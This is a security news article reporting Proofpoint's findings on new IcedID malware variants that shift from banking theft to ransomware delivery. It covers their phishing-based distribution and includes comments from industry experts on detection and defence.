IcedID malware transitioning to ransomware payloads

New variants are being delivered by at least three different threat actors

New variants discovered by researchers

Proofpoint researchers have observed three new variants of the IcedID malware that have shifted the focus from launching banking trojans to delivering ransomware payloads.^[1]

The new malware version has been deployed by multiple threat actors, with some using personalized invoice-themed phishing emails to distribute them. These messages use Microsoft OneNote attachments (.one) to execute a malicious HTA file that runs a PowerShell command and fetches IcedID from a remote resource.

At the same time, the victim is served a decoy PDF. Removing unneeded functions from IcedID, which has been deployed in numerous malicious campaigns with little code change since 2017,^[2] makes it stealthier and leaner, which can help the threat actors evade detection.

The new variants

Proofpoint researchers discovered the first new variant of IcedID, known as “IcedID Lite,” in November 2022. The variant was distributed as a follow-on payload in a TA542 Emotet campaign.^[3] The researchers believe that the original operators behind Emotet have been using an IcedID variant with different functionality.

Another new variant called “Forked” appeared in February 2023, distributed through personalized invoice-themed phishing emails. At the end of February, researchers observed a low-volume campaign distributing IcedID “Forked” via fake notices from the National Traffic and Motor Vehicle Safety Act and the U.S. Food and Drug Administration (FDA).

While some threat actors use new variants of the IcedID malware, others still deploy the “Standard” variant, with one of the most recent campaigns dating back to March 10, 2023. IcedID malware is from the same family as Emotet, which is also a two-stage malware. These malware behavior patterns are easier to identify than a single state, as they have the intention to load additional malicious code.

Experts' views

Antony Farrow, Senior Director of Solution Architecture at Gurucul, said that these malware's behavior patterns make it easier to identify two-stage malware. He added that Emotet and IcedID are known for stealing banking credentials, and now it's transitioned into a C2 loader providing malicious actors with a much more fluid vehicle. It’s naive to believe malware and cyber criminals will stay in their lane, avoiding the use of their best malware and phishing campaigns because an organization is in the “wrong’ sector.”^[4]

According to Craig Burland, Chief Information Security Officer at Inversion6, Proofpoint's research is unwelcome news for cyber defenders, demonstrating cybercriminals acting as digital innovators and savvy entrepreneurs. Burland said the high number of actors and campaigns involving IcedID suggests a potent and flexible strain of malware, which lends itself to other uses.

Krishna Vishnubhotla, Vice President of Product Strategy at Zimperium, said banking malware evolves every year, much like the flu, with the rise of malware-as-a-service. He said that the rapid rate at which malware can infect millions of devices through social engineering and phishing makes it particularly effective on mobile devices.

Vishnubhotla suggested that banks must integrate in-app runtime protection solutions that leverage machine learning within their mobile applications to detect and defend themselves against sophisticated banking malware today. Mobile banking apps need to become risk-aware and self-defending as a practical measure.